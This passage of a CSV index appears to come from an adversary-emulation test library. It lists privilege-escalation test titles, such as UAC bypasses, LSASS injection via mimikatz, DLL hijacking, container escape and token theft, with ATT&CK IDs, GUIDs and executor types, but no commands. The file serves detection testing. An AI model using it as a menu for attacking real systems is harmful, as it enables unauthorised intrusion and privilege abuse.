privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,8,Import XML Schedule Task with Hidden Attribute,cd925593-fbb4-486d-8def-16cbdf944bf4,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,9,PowerShell Modify A Scheduled Task,dda6fc7b-c9a6-4c18-b98d-95ec6542af6d,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,10,"Scheduled Task (""Ghost Task"") via Registry Key Manipulation",704333ca-cc12-4bcf-9916-101844881f54,command_prompt
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,11,Scheduled Task Persistence via CompMgmt.msc,8fcfa3d5-ea7d-4e1c-bd3e-3c4ed315b7d2,command_prompt
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,12,Scheduled Task Persistence via Eventviewer.msc,02124c37-767e-4b76-9383-c9fc366d9d4c,command_prompt
privilege-escalation,T1546.013,Event Triggered Execution: PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
privilege-escalation,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
privilege-escalation,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,10,UACME Bypass Method 23,8ceab7a2-563a-47d2-b5ba-0995211128d7,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,11,UACME Bypass Method 31,b0f76240-9f33-4d34-90e8-3a7d501beb15,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,12,UACME Bypass Method 33,e514bb03-f71c-4b22-9092-9f961ec6fb03,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,13,UACME Bypass Method 34,695b2dac-423e-448e-b6ef-5b88e93011d6,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,14,UACME Bypass Method 39,56163687-081f-47da-bb9c-7b231c5585cf,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,15,UACME Bypass Method 56,235ec031-cd2d-465d-a7ae-68bab281e80e,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,16,UACME Bypass Method 59,dfb1b667-4bb8-4a63-a85e-29936ea75f29,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,17,UACME Bypass Method 61,7825b576-744c-4555-856d-caf3460dc236,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,18,WinPwn - UAC Magic,964d8bf8-37bc-4fd3-ba36-ad13761ebbcc,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,19,WinPwn - UAC Bypass ccmstp technique,f3c145f9-3c8d-422c-bd99-296a17a8f567,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,20,WinPwn - UAC Bypass DiskCleanup technique,1ed67900-66cd-4b09-b546-2a0ef4431a0c,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,21,WinPwn - UAC Bypass DccwBypassUAC technique,2b61977b-ae2d-4ae4-89cb-5c36c89586be,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,22,Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key,251c5936-569f-42f4-9ac2-87a173b9e9b8,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,23,UAC Bypass with WSReset Registry Modification,3b96673f-9c92-40f1-8a3e-ca060846f8d9,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,24,Disable UAC - Switch to the secure desktop when prompting for elevation via registry key,85f3a526-4cfa-4fe7-98c1-dea99be025c7,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,25,Disable UAC notification via registry keys,160a7c77-b00e-4111-9e45-7c2a44eda3fd,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,26,Disable ConsentPromptBehaviorAdmin via registry keys,a768aaa2-2442-475c-8990-69cf33af0f4e,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,27,UAC bypassed by Utilizing ProgIDs registry.,b6f4645c-34ea-4c7c-98f2-d5a2747efb08,command_prompt
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Sudo usage (freebsd),2bf9a018-4664-438a-b435-cc6f8c6f71b1,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,4,Unlimited sudo cache timeout (freebsd),a83ad6e8-6f24-4d7f-8f44-75f8ab742991,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,5,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,6,Disable tty_tickets for sudo caching (freebsd),4df6a0fe-2bdd-4be8-8618-a6a19654a57a,sh
privilege-escalation,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
privilege-escalation,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
privilege-escalation,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
privilege-escalation,T1547,Boot or Logon Autostart Execution,2,Driver Installation Using pnputil.exe,5cb0b071-8a5a-412f-839d-116beb2ed9f7,powershell
privilege-escalation,T1547,Boot or Logon Autostart Execution,3,Leverage Virtual Channels to execute custom DLL during successful RDP session,fdd45306-74f6-4ade-9a97-0a4895961228,command_prompt
privilege-escalation,T1547.014,Active Setup,1,HKLM - Add atomic_test key to launch executable as part of user setup,deff4586-0517-49c2-981d-bbea24d48d71,powershell
privilege-escalation,T1547.014,Active Setup,2,HKLM - Add malicious StubPath value to existing Active Setup Entry,39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a,powershell
privilege-escalation,T1547.014,Active Setup,3,HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number,04d55cef-f283-40ba-ae2a-316bc3b5e78c,powershell
privilege-escalation,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,5,Remote Service Installation CMD,fb4151a2-db33-4f8c-b7f8-78ea8790f961,command_prompt
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,6,Modify Service to Run Arbitrary Binary (Powershell),1f896ce4-8070-4959-8a25-2658856a70c9,powershell
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /etc/cron.d folder,078e69eb-d9fb-450e-b9d0-2e118217c846,sh
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,4,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
privilege-escalation,T1098.003,Account Manipulation: Additional Cloud Roles,1,Azure AD - Add Company Administrator Role to a user,4d77f913-56f5-4a14-b4b1-bf7bb24298ad,powershell
privilege-escalation,T1098.003,Account Manipulation: Additional Cloud Roles,2,Simulate - Post BEC persistence via user password reset followed by user added to company administrator role,14f3af20-61f1-45b8-ad31-4637815f3f44,powershell
privilege-escalation,T1547.012,Boot or Logon Autostart Execution: Print Processors,1,Print Processors,f7d38f47-c61b-47cc-a59d-fc0368f47ed0,powershell
privilege-escalation,T1574.001,Hijack Execution Flow: DLL,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
privilege-escalation,T1574.001,Hijack Execution Flow: DLL,2,Phantom Dll Hijacking - WinAppXRT.dll,46ed938b-c617-429a-88dc-d49b5c9ffedb,command_prompt
privilege-escalation,T1574.001,Hijack Execution Flow: DLL,3,Phantom Dll Hijacking - ualapi.dll,5898902d-c5ad-479a-8545-6f5ab3cfc87f,command_prompt
privilege-escalation,T1574.001,Hijack Execution Flow: DLL,4,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
privilege-escalation,T1574.001,Hijack Execution Flow: DLL,5,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
privilege-escalation,T1574.001,Hijack Execution Flow: DLL,6,"DLL Search Order Hijacking,DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE",c095ad8e-4469-4d33-be9d-6f6d1fb21585,powershell
privilege-escalation,T1055.003,Thread Execution Hijacking,1,Thread Execution Hijacking,578025d5-faa9-4f6d-8390-aae527d503e1,powershell
privilege-escalation,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
privilege-escalation,T1546.011,Event Triggered Execution: Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
privilege-escalation,T1546.011,Event Triggered Execution: Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
privilege-escalation,T1547.010,Boot or Logon Autostart Execution: Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
privilege-escalation,T1037.002,Boot or Logon Initialization Scripts: Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
privilege-escalation,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
privilege-escalation,T1055,Process Injection,3,Section View Injection,c6952f41-6cf0-450a-b352-2ca8dae7c178,powershell
privilege-escalation,T1055,Process Injection,4,Dirty Vanity process Injection,49543237-25db-497b-90df-d0a0a6e8fe2c,powershell
privilege-escalation,T1055,Process Injection,5,Read-Write-Execute process Injection,0128e48e-8c1a-433a-a11a-a5387384f1e1,powershell
privilege-escalation,T1055,Process Injection,6,Process Injection with Go using UuidFromStringA WinAPI,2315ce15-38b6-46ac-a3eb-5e21abef2545,powershell
privilege-escalation,T1055,Process Injection,7,Process Injection with Go using EtwpCreateEtwThread WinAPI,7362ecef-6461-402e-8716-7410e1566400,powershell
privilege-escalation,T1055,Process Injection,8,Remote Process Injection with Go using RtlCreateUserThread WinAPI,a0c1725f-abcd-40d6-baac-020f3cf94ecd,powershell
privilege-escalation,T1055,Process Injection,9,Remote Process Injection with Go using CreateRemoteThread WinAPI,69534efc-d5f5-4550-89e6-12c6457b9edd,powershell
privilege-escalation,T1055,Process Injection,10,Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively),2a4ab5c1-97ad-4d6d-b5d3-13f3a6c94e39,powershell
privilege-escalation,T1055,Process Injection,11,Process Injection with Go using CreateThread WinAPI,2871ed59-3837-4a52-9107-99500ebc87cb,powershell
privilege-escalation,T1055,Process Injection,12,Process Injection with Go using CreateThread WinAPI (Natively),2a3c7035-d14f-467a-af94-933e49fe6786,powershell
privilege-escalation,T1055,Process Injection,13,UUID custom process Injection,0128e48e-8c1a-433a-a11a-a5304734f1e1,powershell
privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
privilege-escalation,T1611,Escape to Host,2,Mount host filesystem to escape privileged Docker container,6c499943-b098-4bc6-8d38-0956fc182984,sh
privilege-escalation,T1611,Escape to Host,3,Privilege Escalation via Docker Volume Mapping,39fab1bc-fcb9-406f-bc2e-fe03e42ff0e4,sh
privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
privilege-escalation,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
privilege-escalation,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,2,Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry,de3f8e74-3351-4fdb-a442-265dbf231738,powershell
privilege-escalation,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
privilege-escalation,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
privilege-escalation,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
privilege-escalation,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
privilege-escalation,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
privilege-escalation,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
privilege-escalation,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,sh
privilege-escalation,T1547.003,Time Providers,1,Create a new time provider,df1efab7-bc6d-4b88-8be9-91f55ae017aa,powershell
privilege-escalation,T1547.003,Time Providers,2,Edit an existing time provider,29e0afca-8d1d-471a-8d34-25512fc48315,powershell
privilege-escalation,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
privilege-escalation,T1546.005,Event Triggered Execution: Trap,2,Trap EXIT (freebsd),be1a5d70-6865-44aa-ab50-42244c9fd16f,sh
privilege-escalation,T1546.005,Event Triggered Execution: Trap,3,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
privilege-escalation,T1546.005,Event Triggered Execution: Trap,4,Trap SIGINT (freebsd),ade10242-1eac-43df-8412-be0d4c704ada,sh
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
privilege-escalation,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
privilege-escalation,T1134.002,Create Process with Token,2,WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique,ccf4ac39-ec93-42be-9035-90e2f26bcd92,powershell
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Make and modify binary from C source (freebsd),dd580455-d84b-481b-b8b0-ac96f3b1dc4c,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,4,Set a SetUID flag on file (freebsd),9be9b827-ff47-4e1b-bef8-217db6fb7283,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,6,Set a SetGID flag on file (freebsd),1f73af33-62a8-4bf1-bd10-3bea931f2c0d,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,7,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,8,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,9,Do reconnaissance for files that have the setuid bit set,8e36da01-cd29-45fd-be72-8a0fcaad4481,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,10,Do reconnaissance for files that have the setgid bit set,3fb46e17-f337-4c14-9f9a-a471946533e2,sh
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,4,Winlogon HKLM Shell Key Persistence - PowerShell,95a3c42f-8c88-4952-ad60-13b81d929a9d,powershell
privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,5,Winlogon HKLM Userinit Key Persistence - PowerShell,f9b8daff-8fa7-4e6a-a1a7-7c14675a545b,powershell
privilege-escalation,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,sh
privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,4,Atbroker.exe (AT) Executes Arbitrary Command via Registry Key,444ff124-4c83-4e28-8df6-6efd3ece6bd4,command_prompt
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,5,Auto-start application on user logon,7125eba8-7b30-426b-9147-781d152be6fb,command_prompt
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,6,Replace utilman.exe (Ease of Access Binary) with cmd.exe,1db380da-3422-481d-a3c8-6d5770dba580,command_prompt
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,7,Replace Magnify.exe (Magnifier binary) with cmd.exe,5e4fa70d-c789-470e-85e1-6992b92bb321,command_prompt
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,8,Replace Narrator.exe (Narrator binary) with cmd.exe,2002f5ea-cd13-4c82-bf73-e46722e5dc5e,command_prompt
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,9,Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe,825ba8ca-71cc-436b-b1dd-ea0d5e109086,command_prompt
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,10,Replace AtBroker.exe (App Switcher binary) with cmd.exe,210be7ea-d841-40ec-b3e1-ff610bb62744,command_prompt
privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,2,EarlyBird APC Queue Injection in Go,73785dd2-323b-4205-ab16-bb6f06677e14,powershell
privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,3,Remote Process Injection with Go using NtQueueApcThreadEx WinAPI,4cc571b1-f450-414a-850f-879baf36aa06,powershell
privilege-escalation,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
privilege-escalation,T1055.002,Process Injection: Portable Executable Injection,1,Portable Executable Injection,578025d5-faa9-4f6d-8390-aae739d503e1,powershell
privilege-escalation,T1547.015,Boot or Logon Autostart Execution: Login Items,1,Persistence by modifying Windows Terminal profile,ec5d76ef-82fe-48da-b931-bdb25a62bc65,powershell
privilege-escalation,T1547.015,Boot or Logon Autostart Execution: Login Items,2,Add macOS LoginItem using Applescript,716e756a-607b-41f3-8204-b214baf37c1d,bash
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,4,Bad Potato,9c6d799b-c111-4749-a42f-ec2f8cb51448,powershell
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,5,Juicy Potato,f095e373-b936-4eb4-8d22-f47ccbfbe64a,powershell
privilege-escalation,T1098.001,Account Manipulation: Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
privilege-escalation,T1098.001,Account Manipulation: Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
privilege-escalation,T1098.001,Account Manipulation: Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
privilege-escalation,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription - CommandLineEventConsumer,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
privilege-escalation,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,2,Persistence via WMI Event Subscription - ActiveScriptEventConsumer,fecd0dfd-fb55-45fa-a10b-6250272d0832,powershell
privilege-escalation,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,3,Windows MOFComp.exe Load MOF File,29786d7e-8916-4de6-9c55-be7b093b2706,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
privilege-escalation,T1546.001,Event Triggered Execution: Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
privilege-escalation,T1546.014,Event Triggered Execution: Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell
